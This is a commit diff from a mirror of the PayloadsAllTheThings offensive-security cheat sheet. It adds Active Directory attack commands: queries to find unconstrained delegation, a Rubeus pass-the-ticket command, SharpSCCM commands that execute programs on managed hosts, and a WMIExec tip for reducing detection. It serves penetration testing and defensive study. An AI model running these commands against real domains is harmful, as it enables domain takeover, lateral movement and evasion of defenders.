Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

WMIExec + SharpSCCM

Browse source
This commit is contained in:
Swissky 2023-02-15 12:33:20 +01:00
parent 36e135776f
commit ae46ac0338
2 changed files with 22 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
Methodology and Resources/Active Directory Attack.md
View file

@ -3422,6 +3422,9 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma
:warning: Unconstrained delegation used to be the only option available in Windows 2000
> **Warning**
> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
#### SpoolService Abuse with Unconstrained Delegation
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
@ -3436,7 +3439,7 @@ The goal is to gain DC Sync privileges using a computer account and the SpoolSer
##### Find delegation
:warning: : Domain controllers usually have unconstrained delegation enabled.
Check the `TrustedForDelegation` property.
Check the `TRUSTED_FOR_DELEGATION` property.
* [ADModule](https://github.com/samratashok/ADModule)
```powershell
@ -3455,6 +3458,9 @@ Check the `TrustedForDelegation` property.
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
```
* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl`
##### SpoolService status
Check if the spool service is running on the remote host
@ -3499,7 +3505,7 @@ If the attack worked you should get a TGT of the domain controller.
Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
.\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt
```
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
@ -3768,6 +3774,13 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
```ps1
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
```
* Compromise client, use locate to find management server
```ps1
MalSCCM.exe locate
@ -3838,6 +3851,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
ConvertFrom-SddlString ""
```
### SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares

6
Methodology and Resources/Windows - Using credentials.md
View file

@ -10,6 +10,7 @@
* [Crackmapexec](#crackmapexec)
* [Impacket](#impacket)
* [PSExec](#psexec)
* [WMIExec](#wmiexec)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -162,6 +163,11 @@ Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCu
You need to update the pipe name to match "Custom_communication" in the line 163
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`
### WMIExec
Use a non default share `-share SHARE` to write the output to reduce the detection.
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
## RDP Remote Desktop Protocol